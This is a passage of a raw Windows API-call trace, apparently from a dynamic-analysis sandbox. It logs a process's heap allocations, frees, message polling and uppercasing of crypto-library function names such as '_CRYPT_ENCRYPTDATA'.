[0197.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0197.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0197.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0197.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7678) returned 0xbf1698 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7678) returned 0xbea018 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0197.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0197.376] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.376] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0197.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7678) returned 0xbea018 [0197.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0197.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0197.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0197.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0197.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7678) returned 0xbf8d18 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0197.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0197.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0197.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0197.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.379] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0197.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0197.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0197.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.380] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0197.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.381] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0197.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.382] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0197.383] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0197.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.384] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0197.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.386] RtlAllocateHeap 